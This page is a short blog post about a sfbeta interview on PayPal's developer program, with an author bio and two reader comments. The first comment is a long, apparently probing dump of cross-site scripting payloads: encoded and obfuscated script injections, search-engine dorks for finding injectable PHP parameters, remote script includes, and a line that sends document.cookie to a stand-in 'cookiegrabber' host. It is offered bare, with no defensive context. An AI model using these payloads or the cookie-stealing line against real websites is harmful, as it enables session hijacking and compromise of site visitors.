On July 1st, I joined Christian Perry of sfbeta on air to talk about PayPal | Developer and what we are trying to accomplish at the company. We get into why I joined the company, what I think we are trying to change with our efforts, and even go into how to stop world hunger, so there’s plenty of topic diversity for everyone.

Without going into too much detail, here’s our video interview:

About Jonathan LeBlanc

Jonathan LeBlanc is an Emmy award winning software engineer, author of the O’Reilly books “Identity and Data Security for Web Development” and "Programming Social Applications", and the Head of Global Developer Advocacy for PayPal. Specializing in identity, auth and security, hardware to web interconnectivity, and data mining techniques, as well as open source initiatives around social engagement, Jonathan works on the development of emerging initiatives towards building a more user-centric web.

Tagged with:
 

3 Responses to sfbeta On Air Interview: Inside the PayPal Developer Network

  1. Narendra Bhati says:

    “>Pwned+by+Max+Govanni
    “>
    “>
    ?debugMode=1&dataURL=’>Click Me For XSS
    %22%3Cmarquee%3E%3Cimg%20src=k%20onerror=alert(%22PWNED%22)%20/
    %3E

    ‘>Click Me For XSS

    <B alert(1)>

    <B="alert(1)”>

    alert(1)

    alert(1)”(EOF)

    : alert(1)”>

    ({0:#0= alert /#0#/#0#(1)});

    2) (1.. __proto__ . e0 = alert )(1. e0 );

    3) a=a setter = alert ;

    4) _ =[[ $ ,__ ,,$$ ,,_$ ,$_ , _$_ ,,, $_$ ]=! ‘ ‘+[!{}]+

    inurl:”.php?cmd=”
    inurl:”.php?z=”

    inurl:”.php?q=”
    inurl:”.php?search=”
    inurl:”.php?query=”
    inurl:”.php?searchstring=”
    inurl:”.php?keyword=”
    inurl:”.php?file=”
    inurl:”.php?years=”
    inurl:”.php?txt=”
    inurl:”.php?tag=”
    inurl:”.php?max=”
    inurl:”.php?from=”
    inurl:”.php?author=”
    inurl:”.php?pass=”
    inurl:”.php?feedback=”
    inurl:”.php?mail=”
    inurl:”.php?cat=”
    inurl:”.php?vote=”
    inurl:search.php?q=
    inurl:com_feedpostold/feedpost.php?url=
    inurl:scrapbook.php?id=
    inurl:headersearch.php?sid=
    inurl:/poll/default.asp?catid=
    inurl:/search_results.php?search=

    PHNjcmlwdD5hbGVydCgnWFNTZWQgQnkgSW5qZWN0T3IgYW5kIEFwM3gnKTwvc2NyaXB0Pg%3D%3D
    Some Attack html & java Strings:
    ==========================
    XSSed By Bluff Master Hacker
    alert(“Hacked”)

    XSSed%20By%20%20lonelyr%20Hacker

    URL Encoded Strings using character codes to Bypass
    ==========================

    Some Java Disaster Strings
    ==========================
    nd_mode=”meteor”;nd_dest=”massive”;nd_control=”on”;nd_vAlign=”bottom”;nd_hAlign=”right”;nd_vMargin=”10″;nd_hMargin=”10″;nd_target=”_top”;

    nd_mode=”cow”;nd_vAlign=”bottom”;nd_hAlign=”right”;nd_vMargin=”10<s”;nd_hMargin=”10?;nd_target=”_top”;

    %3Cscript%20language=%94javascript%94%20src=%94http://www.netdisaster.com/js/mynd.js%94%3E%3C/script%3E

    Any of your Image link
    ==========================

    http://go4webapps.com/wp-content/uploads…utton1.jpg

    <IMG SRC=”javascript:alert(1);”>

    onmouseover=alert(1);

    ¼script¾alert(¢XSS¢)¼/script¾

    BODY{background:url(“javascript:alert(‘XSS’)”)}
    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3eJavascript
    .XSS{background-image:url(“javascript:alert(‘XSS’)”);}
    alert(‘XSS’);
    data:text/html,test
    exp/*
    <META HTTP-EQUIV="Link" Content="; REL=stylesheet”>
    data:text/html;base64,dGVzdA==
    document.write(atob(/dGVzdA==/.source));
    document.write(/test/.source);
    document.write(String.fromCharCode(116,101,115,116,11));
    document.write(“x74x65x73x74x0A”);
    <LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css”>

    <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"
    string.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 116, 121, 112, 101, 61, 118, 98, 115, 99, 114, 105, 112, 116, 62, 77, 115, 103, 66, 111, 120, 40, 48, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62, 13, 10, 13, 10, 39, 39, 59, 33, 45, 45, 34, 60, 88, 83, 83, 62, 61, 38, 123, 40, 41, 125, 13, 10, 13, 10, 39, 62, 47, 47, 92, 92, 44, 60, 39, 62, 34, 62, 34, 62, 34, 42, 34, 13, 10)
    %3C%73%63%72%69%70%74%20%74%79%70%65%3D%76%62%73%63%72%69%70%74%3E%4D%73%67%42%6F%78%28%30%29%3C%2F%73%63%72%69%70%74%3E%0D%0A%0D%0A%27%27%3B%21%2D%2D%22%3C%58%53%53%3E%3D%26%7B%28%29%7D%0D%0A%0D%0A%27%3E%2F%2F%5C%5C%2C%3C%27%3E%22%3E%22%3E%22%2A%22%0D%0A

    <script type=vbscript>MsgBox(0)</script> '';!--"<XSS>=&{()} '>//\\,<'>">">"*"

    &#60&#115&#99&#114&#105&#112&#116&#32&#116&#121&#112&#101&#61&#118&#98&#115&#99&#114&#105&#112&#116&#62&#77&#115&#103&#66&#111&#120&#40&#48&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62&#13&#10&#13&#10&#39&#39&#59&#33&#45&#45&#34&#60&#88&#83&#83&#62&#61&#38&#123&#40&#41&#125&#13&#10&#13&#10&#39&#62&#47&#47&#92&#92&#44&#60&#39&#62&#34&#62&#34&#62&#34&#42&#34&#13&#10

    a=”get”;
    b=”URL(“”;
    c=”javascript:”;
    d=”alert(‘XSS’);”)”;
    eval(a+b+c+d)
    PHNjcmlwdCB0eXBlPXZic2NyaXB0Pk1zZ0JveCgwKTwvc2NyaXB0Pg0KDQonJzshLS0iPFhTUz49JnsoKX0NCg0KJz4vL1xcLDwnPiI+Ij4iKiINCg==

    <IMG SRC="javascript:alert(‘XSS’)”>

    Code:
    MsgBox(0)

    <t:set attributeName="innerHTML" to="XSSalert(“XSS”)”>

    ”;!–“=’>//\,”>”>”*”

    ‘); alert(‘XSS

    alert(1);

    alert(‘XSS’);

    alert(“XSS”)”>
    alert%28String.fromCharCode(84%2C72%2C73%2C83%2C32%2C83%2C73%2C84%2C?69%2C32%2C73%2C83%2C32%2C72%2C65%2C67%2C75%2C69%2C68%2C32%2C66%2C89%2C32%2C66%2C?76%2C85%2C70%2C70%2C32%2C77%2C65%2C83%2C84%2C69%2C82%2C32%2C72%2C65%2C67%2C75%2C?69%2C82%29%29;%2C89%2C32%2C66%2C?76%2C85%2C70%2C70%2C32%2C77%2C65%2C83%2C84%2C69%2C82%2C32%2C72%2C65%2C67%2C75%2C?69%2C82%29%29;

    %3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%2

    prompt(0)

    data:application/msword;base64,0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7

    /…………

    document.write(“x74x65x73x74x0A”);

    %3CIMG+DYNSRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%3E++%3Cfont+style%3D%27color%3Aexpression%28alert%28document.cookie%29%29%27%3E++%3Cimg+src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E++%3Cscript+language%3D%22JavaScript%22%3Ealert%28%27XSS%27%29%3C%2Fscript%3E++%3Cbody+onunload%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E++%3Cbody+onLoad%3D%22alert%28%27XSS%27%29%3B%22++%5Bcolor%3Dred%27+onmouseover%3D%22alert%28%27xss%27%29%22%5Dmouse+over%5B%2Fcolor%5D++%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E++window.alert%28%22Bonjour+%21%22%29%3B++%3Cdiv+style%3D%22x%3Aexpression%28%28window.r%3D%3D1%29%3F%27%27%3Aeval%28%27r%3D1%3B++alert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%27%29%29%22%3E++%3Ciframe%3C%3Fphp+echo+chr%2811%29%3F%3E+onload%3Dalert%28%27XSS%27%29%3E%3C%2Fiframe%3E++%22%3E%3Cscript+alert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E++%27%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E++%27%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E++%3CMETA+HTTP-EQUIV%3D%5C%22refresh%5C%22+CONTENT%3D%5C%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E++%3CMETA+HTTP-EQUIV%3D%5C%22refresh%5C%22+CONTENT%3D%5C%220%3B+URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E++%3Cscript%3Evar+var+%3D+1%3B+alert%28var%29%3C%2Fscript%3E++%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E++%3C%3F%3D%27%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%3F%3E++%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%5C%22XSS%5C%22%29%27%3E++%22+onfocus%3Dalert%28document.domain%29+%22%3E+%3C%22++%3CFRAMESET%3E%3CFRAME+SRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E%3C%2FFRAMESET%3E++%3CSTYLE%3Eli+%7Blist-style-image%3A+url%28%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS++perl+-e+%27print+%5C%22%3CSCR%5C0IPT%3Ealert%28%5C%22XSS%5C%22%29%3C%2FSCR%5C0IPT%3E%5C%22%3B%27+%3E+out++perl+-e+%27print+%5C%22%3CIMG+SRC%3Djava%5C0script%3Aalert%28%5C%22XSS%5C%22%29%3E%5C%22%3B%27+%3E+out++%3Cbr+size%3D%5C%22%26%7Balert%28%27XSS%27%29%7D%5C%22%3E++%3Cscrscriptipt%3Ealert%281%29%3C%2Fscrscriptipt%3E++%3C%2Fbr+style%3Da%3Aexpression%28alert%28%29%29%3E++%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E++%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E++%5Bcolor%3Dred+width%3Dexpression%28alert%28123%29%29%5D%5Bcolor%5D++%3CBASE+HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E++Execute%28MsgBox%28chr%2888%29%26chr%2883%29%26chr%2883%29%29%29%3C++%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%3Cbody+onLoad%3D%22while%28true%29+alert%28%27XSS%27%29%3B%22%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281111%29%3C%2Fscript%3E++%3C%2Ftextarea%3E%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E++%27%22%22%3E%3Cscript+language%3D%22JavaScript%22%3E+alert%28%27X+%5CnS+%5CnS%27%29%3B%3C%2Fscript%3E++%3C%2Fscript%3E%3C%2Fscript%3E%3C%3C%3C%3Cscript%3E%3C%3E%3E%3E%3E%3C%3C%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%3Chtml%3E%3Cnoalert%3E%3Cnoscript%3E%28123%29%3C%2Fnoscript%3E%3Cscript%3E%28123%29%3C%2Fscript%3E++%3CINPUT+TYPE%3D%22IMAGE%22+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E++%27%3E%3C%2Fselect%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%27%3E%22%3E%3Cscript+src+%3D+%27http%3A%2F%2Fwww.site.com%2FXSS.js%27%3E%3C%2Fscript%3E++%7D%3C%2Fstyle%3E%3Cscript%3Ea%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3C%2Fscript%3E++%3CSCRIPT%3Edocument.write%28%22XSS%22%29%3B%3C%2FSCRIPT%3E++a%3D%22get%22%3Bb%3D%22URL%22%3Bc%3D%22javascript%3A%22%3Bd%3D%22alert%28%27xss%27%29%3B%22%3Beval%28a%2Bb%2Bc%2Bd%29%3B++%3D%27%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E++%3Cscript%2Bsrc%3D%22%3E%22%2Bsrc%3D%22http%3A%2F%2Fyoursite.com%2Fxss.js%3F69%252C69%22%3E%3C%2Fscript%3E++%3Cbody+background%3Djavascript%3A%27%22%3E%3Cscript%3Ealert%28navigator.userAgent%29%3C%2Fscript%3E%3E%3C%2Fbody%3E++%22%3E%2FXaDoS%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+src%3D%22http%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E++%22%3E%2FKinG-InFeT.NeT%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E++src%3D%22http%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E++data%3Atext%2Fhtml%3Bcharset%3Dutf-7%3Bbase64%2CIj48L3RpdGxlPjxzY3JpcHQ%2BYWxlcnQoMTMzNyk8L3NjcmlwdD4%3D++%21–%22+%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E++%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Cimg+%22%22%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Ciframe+src%3D%22javascript%3Aalert%28%27XSS+by+%5Cnxss%27%29%3B%22%3E%3C%2Fiframe%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E

    location.href=”http://www.evilsite.org/cookiegrabber.php?cookie”+escape(document.cookie)

    <script>alert(‘XSS’);</script>

    alert(String.fromCharCode(88,83,83))

    @import’javascript:alert(“XSS”)’;

    <? echo('alert(“XSS”)’); ?>

    alert(‘XSS’)

    “>alert(0)

    alert(/xss/)

    alert(/xss/)

    alert(‘XSS’)

    window.alert(“Bonjour !”);

    <iframe onload=alert(‘XSS’)>

    “><script alert(String.fromCharCode(88,83,83))

    ‘>>XSS

    ‘”>>alert(‘XSS’)

    ‘”>>XSS

    var var = 1; alert(var)

    BODY{background:url(“javascript:alert(‘XSS’)”)}

    <?='alert(“XSS”)’?>

    ” onfocus=alert(document.domain) “> <"

    li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS

    perl -e ‘print “alert(“XSS”)”;’ > out

    perl -e ‘print “”;’ > out

    alert(1)

    alert(1)

    “>

    [color=red width=expression(alert(123))][color]

    Execute(MsgBox(chr(88)&chr(83)&chr(83)))alert(123)

    ‘”>alert(1111)

    ‘”>alert(document.cookie)

    ‘””> alert(‘X nS nS’);

    <<<>>><<alert(123)

    (123)(123)

    ‘>alert(123)

    ‘>”>

    }a=eval;b=alert;a(b(/XSS/.source));

    document.write(“XSS”);

    a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);

    =’>alert(“xss”)

    “+src=”http://yoursite.com/xss.js?69%2C69”>

    alert(navigator.userAgent)>

    “>/XaDoS/>alert(document.cookie)

    “>/KinG-InFeT.NeT/>alert(document.cookie)

    src=”http://www.site.com/XSS.js”>

    data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

    !–” />alert(‘xss’);

    alert(“XSS by bhati”)XSS by bhati

    “>alert(“XSS by nxss”)>XSS by bhati

    ‘”>alert(“XSS by nbhati”)>XSS by xss

    alert(“XSS by nxss”)XSS by bhati

    alert(1337)XSS by xss

    “>alert(1337)”>alert(“XSS by nxss

    ‘”>alert(1337)>XSS by xss

    XSS by xss

  2. Narendra Bhati says:

    hello